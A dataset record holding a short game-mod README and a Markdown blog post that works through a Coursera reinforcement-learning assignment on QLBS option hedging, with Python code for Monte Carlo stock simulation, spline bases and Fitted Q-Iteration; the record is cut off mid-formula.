hexsha
stringlengths
40
40
size
int64
5
1.04M
ext
stringclasses
6 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
344
max_stars_repo_name
stringlengths
5
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
11
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
344
max_issues_repo_name
stringlengths
5
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
11
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
344
max_forks_repo_name
stringlengths
5
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
11
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
5
1.04M
avg_line_length
float64
1.14
851k
max_line_length
int64
1
1.03M
alphanum_fraction
float64
0
1
lid
stringclasses
191 values
lid_prob
float64
0.01
1
537f6bed6822408e2feb5e8e23c38c9f6963da0f
106
md
Markdown
README.md
melon-java/melon-mod
c346a92d405eca92f7768a01bdf685d176b4951f
[ "MIT" ]
null
null
null
README.md
melon-java/melon-mod
c346a92d405eca92f7768a01bdf685d176b4951f
[ "MIT" ]
null
null
null
README.md
melon-java/melon-mod
c346a92d405eca92f7768a01bdf685d176b4951f
[ "MIT" ]
null
null
null
# Melon Mod ## Huge mod with a big world to explore! Explore other dimensions on the go or in your chair!
35.333333
93
0.745283
eng_Latn
0.999516
537fe889542da25966f23b78bb289e458b2ca988
45,727
md
Markdown
_posts/2019-8-2-flat.md
BaiLiping/bailiping.github.io
4aa8ffa3e99ed2fc447ee598a10e44d130b65674
[ "MIT" ]
null
null
null
_posts/2019-8-2-flat.md
BaiLiping/bailiping.github.io
4aa8ffa3e99ed2fc447ee598a10e44d130b65674
[ "MIT" ]
null
null
null
_posts/2019-8-2-flat.md
BaiLiping/bailiping.github.io
4aa8ffa3e99ed2fc447ee598a10e44d130b65674
[ "MIT" ]
1
2021-12-23T00:11:07.000Z
2021-12-23T00:11:07.000Z
--- layout: post title: Fitted Q tags: rl --- <script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script> **Goal:** - Setup inputs for batch-RL model - Implement Fitted Q-Iteration ```python import numpy as np import pandas as pd from scipy.stats import norm import random import sys sys.path.append("..") import grading import time import matplotlib.pyplot as plt ``` ```python ### ONLY FOR GRADING. DO NOT EDIT ### submissions=dict() assignment_key="0jn7tioiEeiBAA49aGvLAg" all_parts=["wrZFS","yqg6m","KY5p8","BsRWi","pWxky"] ### ONLY FOR GRADING. DO NOT EDIT ### ``` ```python COURSERA_TOKEN = 'jLCcoh3BbMO5hsCc' # the key provided to the Student under his/her email on submission page COURSERA_EMAIL = '[email protected]'# the email ``` ## Parameters for MC simulation of stock prices ```python S0 = 100 # initial stock price mu = 0.05 # drift sigma = 0.15 # volatility r = 0.03 # risk-free rate M = 1 # maturity T = 6 # number of time steps N_MC = 10000 # 10000 # 50000 # number of paths delta_t = M / T # time interval gamma = np.exp(- r * delta_t) # discount factor ``` ### Black-Sholes Simulation Simulate $$N_{MC}$$ stock price sample paths with $$T$$ steps by the classical Black-Sholes formula. $$dS_t=\mu S_tdt+\sigma S_tdW_t\quad\quad S_{t+1}=S_te^{\left(\mu-\frac{1}{2}\sigma^2\right)\Delta t+\sigma\sqrt{\Delta t}Z}$$ where $$Z$$ is a standard normal random variable. Based on simulated stock price $$S_t$$ paths, compute state variable $$X_t$$ by the following relation. $$X_t=-\left(\mu-\frac{1}{2}\sigma^2\right)t\Delta t+\log S_t$$ Also compute $$\Delta S_t=S_{t+1}-e^{r\Delta t}S_t\quad\quad \Delta\hat{S}_t=\Delta S_t-\Delta\bar{S}_t\quad\quad t=0,...,T-1$$ where $$\Delta\bar{S}_t$$ is the sample mean of all values of $$\Delta S_t$$. Plots of 5 stock price $$S_t$$ and state variable $$X_t$$ paths are shown below. ```python # make a dataset starttime = time.time() np.random.seed(42) # Fix random seed # stock price S = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) S.loc[:,0] = S0 # standard normal random numbers RN = pd.DataFrame(np.random.randn(N_MC,T), index=range(1, N_MC+1), columns=range(1, T+1)) for t in range(1, T+1): S.loc[:,t] = S.loc[:,t-1] * np.exp((mu - 1/2 * sigma**2) * delta_t + sigma * np.sqrt(delta_t) * RN.loc[:,t]) delta_S = S.loc[:,1:T].values - np.exp(r * delta_t) * S.loc[:,0:T-1] delta_S_hat = delta_S.apply(lambda x: x - np.mean(x), axis=0) # state variable X = - (mu - 1/2 * sigma**2) * np.arange(T+1) * delta_t + np.log(S) # delta_t here is due to their conventions endtime = time.time() print('\nTime Cost:', endtime - starttime, 'seconds') # plot 10 paths step_size = N_MC // 10 idx_plot = np.arange(step_size, N_MC, step_size) plt.plot(S.T.iloc[:, idx_plot]) plt.xlabel('Time Steps') plt.title('Stock Price Sample Paths') plt.show() plt.plot(X.T.iloc[:, idx_plot]) plt.xlabel('Time Steps') plt.ylabel('State Variable') plt.show() ``` Time Cost: 0.0767676830291748 second ![png](/assets/img/rlhedge/unit3/output_8_1.png) ![png](/assets/img/rlhedge/unit3/output_8_2.png) Define function *terminal_payoff* to compute the terminal payoff of a European put option. $$H_T\left(S_T\right)=\max\left(K-S_T,0\right)$$ ```python def terminal_payoff(ST, K): # ST final stock price # K strike payoff = max(K-ST, 0) return payoff ``` ## Define spline basis functions ```python import bspline import bspline.splinelab as splinelab X_min = np.min(np.min(X)) X_max = np.max(np.max(X)) print('X.shape = ', X.shape) print('X_min, X_max = ', X_min, X_max) p = 4 # order of spline (as-is; 3 = cubic, 4: B-spline?) ncolloc = 12 tau = np.linspace(X_min,X_max,ncolloc) # These are the sites to which we would like to interpolate # k is a knot vector that adds endpoints repeats as appropriate for a spline of order p # To get meaninful results, one should have ncolloc >= p+1 k = splinelab.aptknt(tau, p) # Spline basis of order p on knots k basis = bspline.Bspline(k, p) f = plt.figure() # B = bspline.Bspline(k, p) # Spline basis functions print('Number of points k = ', len(k)) basis.plot() plt.savefig('Basis_functions.png', dpi=600) ``` X.shape = (10000, 7) X_min, X_max = 4.05752797076 5.16206652917 Number of points k = 17 ![png](/assets/img/rlhedge/unit3/output_12_1.png) ```python type(basis) ``` bspline.bspline.Bspline ```python X.values.shape ``` (10000, 7) ### Make data matrices with feature values "Features" here are the values of basis functions at data points The outputs are 3D arrays of dimensions num_tSteps x num_MC x num_basis ```python num_t_steps = T + 1 num_basis = ncolloc # len(k) # data_mat_t = np.zeros((num_t_steps, N_MC,num_basis )) print('num_basis = ', num_basis) print('dim data_mat_t = ', data_mat_t.shape) # fill it, expand function in finite dimensional space # in neural network the basis is the neural network itself t_0 = time.time() for i in np.arange(num_t_steps): x = X.values[:,i] data_mat_t[i,:,:] = np.array([ basis(el) for el in x ]) t_end = time.time() print('Computational time:', t_end - t_0, 'seconds') ``` num_basis = 12 dim data_mat_t = (7, 10000, 12) Computational time: 13.818428993225098 seconds ```python # save these data matrices for future re-use np.save('data_mat_m=r_A_%d' % N_MC, data_mat_t) ``` ```python print(data_mat_t.shape) # shape num_steps x N_MC x num_basis print(len(k)) ``` (7, 10000, 12) 17 ## Dynamic Programming solution for QLBS The MDP problem in this case is to solve the following Bellman optimality equation for the action-value function. $$Q_t^\star\left(x,a\right)=\mathbb{E}_t\left[R_t\left(X_t,a_t,X_{t+1}\right)+\gamma\max_{a_{t+1}\in\mathcal{A}}Q_{t+1}^\star\left(X_{t+1},a_{t+1}\right)\space|\space X_t=x,a_t=a\right],\space\space t=0,...,T-1,\quad\gamma=e^{-r\Delta t}$$ where $$R_t\left(X_t,a_t,X_{t+1}\right)$$ is the one-step time-dependent random reward and $$a_t\left(X_t\right)$$ is the action (hedge). Detailed steps of solving this equation by Dynamic Programming are illustrated below. With this set of basis functions $$\left\{\Phi_n\left(X_t^k\right)\right\}_{n=1}^N$$, expand the optimal action (hedge) $$a_t^\star\left(X_t\right)$$ and optimal Q-function $$Q_t^\star\left(X_t,a_t^\star\right)$$ in basis functions with time-dependent coefficients. $$a_t^\star\left(X_t\right)=\sum_n^N{\phi_{nt}\Phi_n\left(X_t\right)}\quad\quad Q_t^\star\left(X_t,a_t^\star\right)=\sum_n^N{\omega_{nt}\Phi_n\left(X_t\right)}$$ Coefficients $$\phi_{nt}$$ and $$\omega_{nt}$$ are computed recursively backward in time for $$t=T−1,...,0$$. Coefficients for expansions of the optimal action $$a_t^\star\left(X_t\right)$$ are solved by $$\phi_t=\mathbf A_t^{-1}\mathbf B_t$$ where $$\mathbf A_t$$ and $$\mathbf B_t$$ are matrix and vector respectively with elements given by $$A_{nm}^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\Phi_m\left(X_t^k\right)\left(\Delta\hat{S}_t^k\right)^2}\quad\quad B_n^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\left[\hat\Pi_{t+1}^k\Delta\hat{S}_t^k+\frac{1}{2\gamma\lambda}\Delta S_t^k\right]}$$ Define function *function_A* and *function_B* to compute the value of matrix $$\mathbf A_t$$ and vector $$\mathbf B_t$$. ## Define the option strike and risk aversion parameter ```python risk_lambda = 0.001 # 0.001 # 0.0001 # risk aversion K = 100 # # Note that we set coef=0 below in function function_B_vec. This correspond to a pure risk-based hedging ``` ## Part 1: Implement functions to compute optimal hedges **Instructions:** Copy-paste implementations from the previous assignment, i.e. QLBS as these are the same functions ```python # functions to compute optimal hedges def function_A_vec(t, delta_S_hat, data_mat, reg_param): """ function_A_vec - compute the matrix A_{nm} from Eq. (52) (with a regularization!) Eq. (52) in QLBS Q-Learner in the Black-Scholes-Merton article Arguments: t - time index, a scalar, an index into time axis of data_mat delta_S_hat - pandas.DataFrame of dimension N_MC x T data_mat - pandas.DataFrame of dimension T x N_MC x num_basis reg_param - a scalar, regularization parameter Return: - np.array, i.e. matrix A_{nm} of dimension num_basis x num_basis """ ### START CODE HERE ### (≈ 5-6 lines of code) # A_mat = your code goes here ... X_mat = data_mat[t, :, :] num_basis_funcs = X_mat.shape[1] this_dS = delta_S_hat.loc[:, t] hat_dS2 = (this_dS ** 2).reshape(-1, 1) A_mat = np.dot(X_mat.T, X_mat * hat_dS2) + reg_param * np.eye(num_basis_funcs) ### END CODE HERE ### return A_mat def function_B_vec(t, Pi_hat, delta_S_hat=delta_S_hat, S=S, data_mat=data_mat_t, gamma=gamma, risk_lambda=risk_lambda): """ function_B_vec - compute vector B_{n} from Eq. (52) QLBS Q-Learner in the Black-Scholes-Merton article Arguments: t - time index, a scalar, an index into time axis of delta_S_hat Pi_hat - pandas.DataFrame of dimension N_MC x T of portfolio values delta_S_hat - pandas.DataFrame of dimension N_MC x T S - pandas.DataFrame of simulated stock prices data_mat - pandas.DataFrame of dimension T x N_MC x num_basis gamma - one time-step discount factor $exp(-r \delta t)$ risk_lambda - risk aversion coefficient, a small positive number Return: B_vec - np.array() of dimension num_basis x 1 """ # coef = 1.0/(2 * gamma * risk_lambda) # override it by zero to have pure risk hedge coef = 0. # keep it ### START CODE HERE ### (≈ 3-4 lines of code) # B_vec = your code goes here ... tmp = Pi_hat.loc[:,t+1] * delta_S_hat.loc[:, t] X_mat = data_mat[t, :, :] # matrix of dimension N_MC x num_basis B_vec = np.dot(X_mat.T, tmp) ### END CODE HERE ### return B_vec ``` ## Compute optimal hedge and portfolio value Call *function_A* and *function_B* for $$t=T-1,...,0$$ together with basis function $$\Phi_n\left(X_t\right)$$ to compute optimal action $$a_t^\star\left(X_t\right)=\sum_n^N{\phi_{nt}\Phi_n\left(X_t\right)}$$ backward recursively with terminal condition $$a_T^\star\left(X_T\right)=0$$. Once the optimal hedge $$a_t^\star\left(X_t\right)$$ is computed, the portfolio value $$\Pi_t$$ could also be computed backward recursively by $$\Pi_t=\gamma\left[\Pi_{t+1}-a_t^\star\Delta S_t\right]\quad t=T-1,...,0$$ together with the terminal condition $$\Pi_T=H_T\left(S_T\right)=\max\left(K-S_T,0\right)$$ for a European put option. Also compute $$\hat{\Pi}_t=\Pi_t-\bar{\Pi}_t$$, where $$\bar{\Pi}_t$$ is the sample mean of all values of $$\Pi_t$$. ```python starttime = time.time() # portfolio value Pi = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Pi.iloc[:,-1] = S.iloc[:,-1].apply(lambda x: terminal_payoff(x, K)) Pi_hat = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Pi_hat.iloc[:,-1] = Pi.iloc[:,-1] - np.mean(Pi.iloc[:,-1]) # optimal hedge a = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) a.iloc[:,-1] = 0 reg_param = 1e-3 for t in range(T-1, -1, -1): A_mat = function_A_vec(t, delta_S_hat, data_mat_t, reg_param) B_vec = function_B_vec(t, Pi_hat, delta_S_hat, S, data_mat_t) # print ('t = A_mat.shape = B_vec.shape = ', t, A_mat.shape, B_vec.shape) phi = np.dot(np.linalg.inv(A_mat), B_vec) a.loc[:,t] = np.dot(data_mat_t[t,:,:],phi) Pi.loc[:,t] = gamma * (Pi.loc[:,t+1] - a.loc[:,t] * delta_S.loc[:,t]) Pi_hat.loc[:,t] = Pi.loc[:,t] - np.mean(Pi.loc[:,t]) a = a.astype('float') Pi = Pi.astype('float') Pi_hat = Pi_hat.astype('float') endtime = time.time() print('Computational time:', endtime - starttime, 'seconds') ``` /opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:21: FutureWarning: reshape is deprecated and will raise in a subsequent release. Please use .values.reshape(...) instead Computational time: 3.004925489425659 seconds Plots of 5 optimal hedge $$a_t^\star$$ and portfolio value $$\Pi_t$$ paths are shown below. ```python # plot 10 paths plt.plot(a.T.iloc[:,idx_plot]) plt.xlabel('Time Steps') plt.title('Optimal Hedge') plt.show() plt.plot(Pi.T.iloc[:,idx_plot]) plt.xlabel('Time Steps') plt.title('Portfolio Value') plt.show() ``` ![png](/assets/img/rlhedge/unit3/output_30_0.png) ![png](/assets/img/rlhedge/unit3/output_30_1.png) Once the optimal hedge $$a_t^\star$$ and portfolio value $$\Pi_t$$ are all computed, the reward function $$R_t\left(X_t,a_t,X_{t+1}\right)$$ could then be computed by $$R_t\left(X_t,a_t,X_{t+1}\right)=\gamma a_t\Delta S_t-\lambda Var\left[\Pi_t\space|\space\mathcal F_t\right]\quad t=0,...,T-1$$ with terminal condition $$R_T=-\lambda Var\left[\Pi_T\right]$$. Plot of 5 reward function $$R_t$$ paths is shown below. ## Part 2: Compute the optimal Q-function with the DP approach Coefficients for expansions of the optimal Q-function $$Q_t^\star\left(X_t,a_t^\star\right)$$ are solved by $$$\omega_t=\mathbf C_t^{-1}\mathbf D_t$$ where $$\mathbf C_t$$ and $$\mathbf D_t$$ are matrix and vector respectively with elements given by $$C_{nm}^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\Phi_m\left(X_t^k\right)}\quad\quad D_n^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Phi_n\left(X_t^k\right)\left(R_t\left(X_t,a_t^\star,X_{t+1}\right)+\gamma\max_{a_{t+1}\in\mathcal{A}}Q_{t+1}^\star\left(X_{t+1},a_{t+1}\right)\right)}$$ Define function *function_C* and *function_D* to compute the value of matrix $$\mathbf C_t$$ and vector $$\mathbf D_t$$. **Instructions:** Copy-paste implementations from the previous assignment,i.e. QLBS as these are the same functions ```python def function_C_vec(t, data_mat, reg_param): """ function_C_vec - calculate C_{nm} matrix from Eq. (56) (with a regularization!) Eq. (56) in QLBS Q-Learner in the Black-Scholes-Merton article Arguments: t - time index, a scalar, an index into time axis of data_mat data_mat - pandas.DataFrame of values of basis functions of dimension T x N_MC x num_basis reg_param - regularization parameter, a scalar Return: C_mat - np.array of dimension num_basis x num_basis """ ### START CODE HERE ### (≈ 5-6 lines of code) # C_mat = your code goes here .... X_mat = data_mat[t, :, :] num_basis_funcs = X_mat.shape[1] C_mat = np.dot(X_mat.T, X_mat) + reg_param * np.eye(num_basis_funcs) ### END CODE HERE ### return C_mat def function_D_vec(t, Q, R, data_mat, gamma=gamma): """ function_D_vec - calculate D_{nm} vector from Eq. (56) (with a regularization!) Eq. (56) in QLBS Q-Learner in the Black-Scholes-Merton article Arguments: t - time index, a scalar, an index into time axis of data_mat Q - pandas.DataFrame of Q-function values of dimension N_MC x T R - pandas.DataFrame of rewards of dimension N_MC x T data_mat - pandas.DataFrame of values of basis functions of dimension T x N_MC x num_basis gamma - one time-step discount factor $exp(-r \delta t)$ Return: D_vec - np.array of dimension num_basis x 1 """ ### START CODE HERE ### (≈ 2-3 lines of code) # D_vec = your code goes here ... X_mat = data_mat[t, :, :] D_vec = np.dot(X_mat.T, R.loc[:,t] + gamma * Q.loc[:, t+1]) ### END CODE HERE ### return D_vec ``` Call *function_C* and *function_D* for $t=T-1,...,0$ together with basis function $\Phi_n\left(X_t\right)$ to compute optimal action Q-function $Q_t^\star\left(X_t,a_t^\star\right)=\sum_n^N{\omega_{nt}\Phi_n\left(X_t\right)}$ backward recursively with terminal condition $Q_T^\star\left(X_T,a_T=0\right)=-\Pi_T\left(X_T\right)-\lambda Var\left[\Pi_T\left(X_T\right)\right]$. Compare the QLBS price to European put price given by Black-Sholes formula. $$C_t^{\left(BS\right)}=Ke^{-r\left(T-t\right)}\mathcal N\left(-d_2\right)-S_t\mathcal N\left(-d_1\right)$$ ```python # The Black-Scholes prices def bs_put(t, S0=S0, K=K, r=r, sigma=sigma, T=M): d1 = (np.log(S0/K) + (r + 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t) d2 = (np.log(S0/K) + (r - 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t) price = K * np.exp(-r * (T-t)) * norm.cdf(-d2) - S0 * norm.cdf(-d1) return price def bs_call(t, S0=S0, K=K, r=r, sigma=sigma, T=M): d1 = (np.log(S0/K) + (r + 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t) d2 = (np.log(S0/K) + (r - 1/2 * sigma**2) * (T-t)) / sigma / np.sqrt(T-t) price = S0 * norm.cdf(d1) - K * np.exp(-r * (T-t)) * norm.cdf(d2) return price ``` ## Hedging and Pricing with Reinforcement Learning Implement a batch-mode off-policy model-free Q-Learning by Fitted Q-Iteration. The only data available is given by a set of $N_{MC}$ paths for the underlying state variable $X_t$, hedge position $a_t$, instantaneous reward $R_t$ and the next-time value $X_{t+1}$. $$\mathcal F_t^k=\left\{\left(X_t^k,a_t^k,R_t^k,X_{t+1}^k\right)\right\}_{t=0}^{T-1}\quad k=1,...,N_{MC}$$ Detailed steps of solving the Bellman optimalty equation by Reinforcement Learning are illustrated below. Expand Q-function in basis functions with time-dependent coefficients parametrized by a matrix $\mathbf W_t$. $$Q_t^\star\left(X_t,a_t\right)=\mathbf A_t^T\mathbf W_t\Phi\left(X_t\right)=\mathbf A_t^T\mathbf U_W\left(t,X_t\right)=\vec{W}_t^T \vec{\Psi}\left(X_t,a_t\right)$$ $$\mathbf A_t=\left(\begin{matrix}1\\a_t\\\frac{1}{2}a_t^2\end{matrix}\right)\quad\mathbf U_W\left(t,X_t\right)=\mathbf W_t\Phi\left(X_t\right)$$ where $\vec{W}_t$ is obtained by concatenating columns of matrix $\mathbf W_t$ while $ vec \left( {\bf \Psi} \left(X_t,a_t \right) \right) = vec \, \left( {\bf A}_t \otimes {\bf \Phi}^T(X) \right) $ stands for a vector obtained by concatenating columns of the outer product of vectors $ {\bf A}_t $ and $ {\bf \Phi}(X) $. Compute vector $\mathbf A_t$ then compute $\vec\Psi\left(X_t,a_t\right)$ for each $X_t^k$ and store in a dictionary with key path and time $\left[k,t\right]$. ## Part 3: Make off-policy data - **on-policy** data - contains an optimal action and the corresponding reward - **off-policy** data - contains random action and the corresponding reward Given a large enough sample, i.e. N_MC tending to infinity Q-Learner will learn an optimal policy from the data in a model-free setting. In our case a random action is an optimal action + noise generated by sampling from uniform: distribution $$a_t\left(X_t\right) = a_t^\star\left(X_t\right) \sim U\left[1-\eta, 1 + \eta\right]$$ where $\eta$ is a disturbance level In other words, each noisy action is calculated by taking optimal action computed previously and multiplying it by a uniform r.v. in the interval $\left[1-\eta, 1 + \eta\right]$ **Instructions:** In the loop below: - Compute the optimal policy, and write the result to a_op - Now disturb these values by a random noise $$a_t\left(X_t\right) = a_t^\star\left(X_t\right) \sim U\left[1-\eta, 1 + \eta\right]$$ - Compute portfolio values corresponding to observed actions $$\Pi_t=\gamma\left[\Pi_{t+1}-a_t^\star\Delta S_t\right]\quad t=T-1,...,0$$ - Compute rewards corrresponding to observed actions $$R_t\left(X_t,a_t,X_{t+1}\right)=\gamma a_t\Delta S_t-\lambda Var\left[\Pi_t\space|\space\mathcal F_t\right]\quad t=T-1,...,0$$ with terminal condition $$R_T=-\lambda Var\left[\Pi_T\right]$$ ```python eta = 0.5 # 0.5 # 0.25 # 0.05 # 0.5 # 0.1 # 0.25 # 0.15 reg_param = 1e-3 np.random.seed(42) # Fix random seed # disturbed optimal actions to be computed a_op = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) a_op.iloc[:,-1] = 0 # also make portfolios and rewards # portfolio value Pi_op = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Pi_op.iloc[:,-1] = S.iloc[:,-1].apply(lambda x: terminal_payoff(x, K)) Pi_op_hat = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) Pi_op_hat.iloc[:,-1] = Pi_op.iloc[:,-1] - np.mean(Pi_op.iloc[:,-1]) # reward function R_op = pd.DataFrame([], index=range(1, N_MC+1), columns=range(T+1)) R_op.iloc[:,-1] = - risk_lambda * np.var(Pi_op.iloc[:,-1]) # The backward loop for t in range(T-1, -1, -1): ### START CODE HERE ### (≈ 11-12 lines of code) # 1. Compute the optimal policy, and write the result to a_op a_op.loc[:, t] = a.loc[:, t] # 2. Now disturb these values by a random noise a_op.loc[:, t] *= np.random.uniform(1 - eta, 1 + eta, size=a_op.shape[0]) # 3. Compute portfolio values corresponding to observed actions Pi_op.loc[:,t] = gamma * (Pi_op.loc[:,t+1] - a_op.loc[:,t] * delta_S.loc[:,t]) Pi_hat.loc[:,t] = Pi_op.loc[:,t] - np.mean(Pi_op.loc[:,t]) # 4. Compute rewards corrresponding to observed actions R_op.loc[:,t] = gamma * a_op.loc[:,t] * delta_S.loc[:,t] - risk_lambda * np.var(Pi_op.loc[:,t]) ### END CODE HERE ### print('done with backward loop!') ``` done with backward loop! ```python ### GRADED PART (DO NOT EDIT) ### np.random.seed(42) idx_row = np.random.randint(low=0, high=R_op.shape[0], size=10) np.random.seed(42) idx_col = np.random.randint(low=0, high=R_op.shape[1], size=10) part_1 = list(R_op.loc[idx_row, idx_col].values.flatten()) try: part1 = " ".join(map(repr, part_1)) except TypeError: part1 = repr(part_1) submissions[all_parts[0]]=part1 grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key,all_parts[:1],all_parts,submissions) R_op.loc[idx_row, idx_col].values.flatten() ### GRADED PART (DO NOT EDIT) ### ``` Submission successful, please check on the coursera grader page for the status array([ -4.41648229e-02, -1.11627835e+00, -3.26618627e-01, -4.41648229e-02, 1.86629772e-01, -3.26618627e-01, -3.26618627e-01, -4.41648229e-02, -1.91643174e+00, 1.86629772e-01, -4.41648229e-02, -1.15471981e+01, 8.36214406e-03, -4.41648229e-02, -5.19860756e-01, 8.36214406e-03, 8.36214406e-03, -4.41648229e-02, -5.82629891e-02, -5.19860756e-01, -4.41648229e-02, -2.93024596e+00, -6.70591047e-01, -4.41648229e-02, 3.38303735e-01, -6.70591047e-01, -6.70591047e-01, -4.41648229e-02, -1.35776224e-01, 3.38303735e-01, -4.41648229e-02, 3.89179538e-02, -2.11256164e+00, -4.41648229e-02, -8.62139383e-01, -2.11256164e+00, -2.11256164e+00, -4.41648229e-02, 1.03931641e+00, -8.62139383e-01, -4.41648229e-02, -3.88581528e+00, -2.78664643e-01, -4.41648229e-02, 1.08026845e+00, -2.78664643e-01, -2.78664643e-01, -4.41648229e-02, -1.59815566e-01, 1.08026845e+00, -4.41648229e-02, 1.34127261e+00, -1.32542466e+00, -4.41648229e-02, -1.75711669e-01, -1.32542466e+00, -1.32542466e+00, -4.41648229e-02, -6.89031647e-01, -1.75711669e-01, -4.41648229e-02, 1.36065847e+00, -4.83656917e-03, -4.41648229e-02, 1.01545031e+00, -4.83656917e-03, -4.83656917e-03, -4.41648229e-02, 1.06509261e+00, 1.01545031e+00, -4.41648229e-02, -5.48069399e-01, 6.69233272e+00, -4.41648229e-02, 2.48031088e+00, 6.69233272e+00, 6.69233272e+00, -4.41648229e-02, -4.96873017e-01, 2.48031088e+00, -4.41648229e-02, 1.05762523e+00, -5.25381441e+00, -4.41648229e-02, -3.93284570e+00, -5.25381441e+00, -5.25381441e+00, -4.41648229e-02, -1.75980494e-01, -3.93284570e+00, -4.41648229e-02, -1.12194921e-01, -2.04245741e-02, -4.41648229e-02, -2.95192215e-01, -2.04245741e-02, -2.04245741e-02, -4.41648229e-02, -1.70008788e+00, -2.95192215e-01]) ```python ### GRADED PART (DO NOT EDIT) ### np.random.seed(42) idx_row = np.random.randint(low=0, high=Pi_op.shape[0], size=10) np.random.seed(42) idx_col = np.random.randint(low=0, high=Pi_op.shape[1], size=10) part_2 = list(Pi_op.loc[idx_row, idx_col].values.flatten()) try: part2 = " ".join(map(repr, part_2)) except TypeError: part2 = repr(part_2) submissions[all_parts[1]]=part2 grading.submit(COURSERA_EMAIL, COURSERA_TOKEN, assignment_key,all_parts[:2],all_parts,submissions) Pi_op.loc[idx_row, idx_col].values.flatten() ### GRADED PART (DO NOT EDIT) ### ``` Submission successful, please check on the coursera grader page for the status array([ 0. , 1.42884104, 0.33751419, 0. , 1.21733506, 0.33751419, 0.33751419, 0. , 3.11498207, 1.21733506, 0. , 11.42133749, -0.10310673, 0. , 11.86648425, -0.10310673, -0.10310673, 0. , 11.85284966, 11.86648425, 0. , 3.77013248, 0.86748124, 0. , 3.39527529, 0.86748124, 0.86748124, 0. , 3.50140426, 3.39527529, 0. , 2.37907167, 2.45349463, 0. , 3.21159555, 2.45349463, 2.45349463, 0. , 2.143548 , 3.21159555, 0. , 4.22816728, 0.36745282, 0. , 3.10906092, 0.36745282, 0.36745282, 0. , 3.24065673, 3.10906092, 0. , 1.4213709 , 2.79987609, 0. , 1.57224362, 2.79987609, 2.79987609, 0. , 2.24072042, 1.57224362, 9.05061694, 4.48960086, 5.90296866, 9.05061694, 3.43400874, 5.90296866, 5.90296866, 9.05061694, 2.3390757 , 3.43400874, 11.39022164, 5.65090831, 5.15180177, 11.39022164, 3.12466356, 5.15180177, 5.15180177, 11.39022164, 3.59323901, 3.12466356, 0. , 3.05819303, 4.15983366, 0. , 6.95803609, 4.15983366, 4.15983366, 0. , 7.08659999, 6.95803609, 0. , 0.12024876, 0.03147899, 0. , 0.3970914 , 0.03147899, 0.03147899, 0. , 2.08248553, 0.3970914 ]) ## Override on-policy data with off-policy data ```python # Override on-policy data with off-policy data a = a_op.copy() # distrubed actions Pi = Pi_op.copy() # disturbed portfolio values Pi_hat = Pi_op_hat.copy() R = R_op.copy() ``` ```python # make matrix A_t of shape (3 x num_MC x num_steps) num_MC = a.shape[0] # number of simulated paths num_TS = a.shape[1] # number of time steps a_1_1 = a.values.reshape((1, num_MC, num_TS)) a_1_2 = 0.5 * a_1_1**2 ones_3d = np.ones((1, num_MC, num_TS)) A_stack = np.vstack((ones_3d, a_1_1, a_1_2)) print(A_stack.shape) ``` (3, 10000, 7) ```python data_mat_swap_idx = np.swapaxes(data_mat_t,0,2) print(data_mat_swap_idx.shape) # (12, 10000, 25) # expand dimensions of matrices to multiply element-wise A_2 = np.expand_dims(A_stack, axis=1) # becomes (3,1,10000,25) data_mat_swap_idx = np.expand_dims(data_mat_swap_idx, axis=0) # becomes (1,12,10000,25) Psi_mat = np.multiply(A_2, data_mat_swap_idx) # this is a matrix of size 3 x num_basis x num_MC x num_steps # now concatenate columns along the first dimension # Psi_mat = Psi_mat.reshape(-1, a.shape[0], a.shape[1], order='F') Psi_mat = Psi_mat.reshape(-1, N_MC, T+1, order='F') print(Psi_mat.shape) # ``` (12, 10000, 7) (36, 10000, 7) ```python # make matrix S_t Psi_1_aux = np.expand_dims(Psi_mat, axis=1) Psi_2_aux = np.expand_dims(Psi_mat, axis=0) print(Psi_1_aux.shape, Psi_2_aux.shape) S_t_mat = np.sum(np.multiply(Psi_1_aux, Psi_2_aux), axis=2) print(S_t_mat.shape) ``` (36, 1, 10000, 7) (1, 36, 10000, 7) (36, 36, 7) ```python # clean up some space del Psi_1_aux, Psi_2_aux, data_mat_swap_idx, A_2 ``` ## Part 4: Calculate $\mathbf S_t$ and $\mathbf M_t$ marix and vector Vector $\vec W_t$ could be solved by $$\vec W_t=\mathbf S_t^{-1}\mathbf M_t$$ where $\mathbf S_t$ and $\mathbf M_t$ are matrix and vector respectively with elements given by $$S_{nm}^{\left(t\right)}=\sum_{k=1}^{N_{MC}}{\Psi_n\left(X_t^k,a_t^k\right)\Psi_m\left(X_t^k,a_t^k\right)}\quad\quad 